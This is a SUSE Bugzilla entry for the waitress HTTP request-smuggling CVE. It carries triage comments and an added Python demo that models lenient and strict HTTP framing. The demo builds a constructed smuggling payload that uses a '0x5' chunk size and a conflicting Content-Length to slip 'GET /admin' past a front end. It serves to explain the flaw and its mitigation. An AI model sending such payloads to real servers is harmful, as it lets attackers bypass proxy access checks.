Bugzilla – Bug 1197255
VUL-0: CVE-2022-24761: python-waitress: Inconsistent Interpretation of HTTP Requests leading to request smuggling
Last modified: 2022-09-22 11:41:58 UTC
When using Waitress behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends.
This allows requests to be smuggled through the front-end proxy to Waitress, bypassing checks the proxy applies and influencing how later requests on the connection are handled.
Affected versions: <= 2.1.0.
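The description above is abstract, so here is an added, self-contained illustration of the bug class (example code written for this page, not Waitress's or any proxy's parser). The upstream advisory for this CVE attributes the disagreement to lenient integer parsing (Python's int() accepting forms such as +10 or 0x01 where RFC 7230 allows only digits or hex digits) and to unvalidated chunk extensions; the three framing policies modelled here ("strict", "lenient", "clonly"), the header names and the request stream are assumptions constructed for the demo. The "strict" policy is what a fronting proxy that enforces RFC 7230 does, which is why such a proxy makes the smuggling non-exploitable.

```python
"""Added illustration of the bug class behind CVE-2022-24761: two HTTP/1.1
framers read the same bytes but disagree on where the first request ends.
Example code written for this page; it is not Waitress's or any proxy's own
parser, and the exact leniencies modelled are an assumption."""
import re

CRLF = b"\r\n"
HEXDIG = re.compile(rb"^[0-9A-Fa-f]+$")   # RFC 7230: chunk-size = 1*HEXDIG


def chunk_size(field: bytes, strict: bool) -> int:
    """Parse a chunk-size token (any ';' extension already stripped)."""
    if strict:
        if not HEXDIG.match(field):
            raise ValueError("malformed chunk-size %r" % field)
        return int(field, 16)
    # Lenient model: Python's int(s, 16) also accepts surrounding whitespace,
    # a sign, a 0x prefix and underscores, so b"0x5" and b"+5" both become 5.
    return int(field.decode("ascii"), 16)


def parse_headers(head: bytes) -> dict:
    """Header block -> {lower-case name: value}; the request-line is skipped."""
    hdrs = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        hdrs[name.strip().lower()] = value.strip()
    return hdrs


def frame(data: bytes, policy: str) -> list:
    """Split a byte stream into (request-line, body) pairs.

    "strict":  RFC 7230 framing; a malformed chunk-size, or a message with
               both Transfer-Encoding and Content-Length, is rejected.
    "lenient": chunked framing with the int() leniency modelled above.
    "clonly":  frames by Content-Length and never parses chunks (a front
               end that does not validate Transfer-Encoding at all).
    """
    out, pos = [], 0
    while pos < len(data):
        end = data.find(CRLF + CRLF, pos)
        if end == -1:
            raise ValueError("truncated header block")
        head, pos = data[pos:end], end + 4
        hdrs = parse_headers(head)
        te = hdrs.get(b"transfer-encoding", b"").lower()
        cl = hdrs.get(b"content-length")
        if policy == "strict" and te and cl is not None:
            raise ValueError("both Transfer-Encoding and Content-Length")
        if te == b"chunked" and policy != "clonly":
            body = b""
            while True:
                eol = data.find(CRLF, pos)
                if eol == -1:
                    raise ValueError("truncated chunk")
                n = chunk_size(data[pos:eol].split(b";", 1)[0],
                               policy == "strict")
                pos = eol + 2
                if n == 0:
                    pos += 2          # empty trailer section + final CRLF
                    break
                body += data[pos:pos + n]
                pos += n + 2          # chunk data and its trailing CRLF
        else:
            n = int(cl.decode("ascii")) if cl else 0
            body, pos = data[pos:pos + n], pos + n
        out.append((head.split(CRLF)[0], body))
    return out


def view(data: bytes, policy: str):
    """Request-lines a parser with this policy sees, or why it rejected."""
    try:
        return [req for req, _ in frame(data, policy)]
    except ValueError as exc:
        return "rejected: %s" % exc


# Constructed attacker stream (not a real capture).  The chunked body uses the
# non-RFC chunk-size "0x5"; the bytes after the last chunk are a complete
# second request.  Content-Length is chosen so that a front end framing by
# Content-Length alone treats everything as ONE request body.
CHUNKED_BODY = b"0x5\r\nhello\r\n0\r\n\r\n"
SMUGGLED_TAIL = b"GET /admin HTTP/1.1\r\nHost: app\r\n\r\n"
SMUGGLE = (
    b"POST /upload HTTP/1.1\r\nHost: app\r\nTransfer-Encoding: chunked\r\n"
    + (b"Content-Length: %d\r\n\r\n" % len(CHUNKED_BODY + SMUGGLED_TAIL))
    + CHUNKED_BODY + SMUGGLED_TAIL
)
TE_ONLY = (
    b"POST /upload HTTP/1.1\r\nHost: app\r\nTransfer-Encoding: chunked\r\n\r\n"
    + CHUNKED_BODY + SMUGGLED_TAIL
)

if __name__ == "__main__":
    for stream, label in ((SMUGGLE, "CL+TE"), (TE_ONLY, "TE only")):
        for policy in ("clonly", "lenient", "strict"):
            print(label, policy, view(stream, policy))
```

Running it shows the disagreement directly: the "clonly" front end sees one POST whose body happens to contain the GET, the "lenient" back end sees a POST with body "hello" followed by a GET /admin that the front end never evaluated as a request, and the "strict" front end rejects both streams before anything is forwarded.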
This is an autogenerated message for OBS integration:
This bug (1197255) was mentioned in
https://build.opensuse.org/request/show/962909 Factory / python-waitress
Please let me know if the explanation in comment #2 is OK for you for the SOC-impacted parts.
Thanks in advance
Based on comment #12, back to the Security team.
This is a public comment for possible customer questions: for SOC deployments, we choose the workaround instead of fixing python-waitress. The incoming packets will always be RFC 7230-conformant thanks to the fronting proxy. Therefore the request smuggling is not exploitable.
Matej, is python-waitress under your wing, or is it handled by the coldpool team?
$ isc maintainer python-waitress --email
Defined in package: SUSE:SLE-15:GA/python-waitress
bugowner of python-waitress :
maintainer of python-waitress :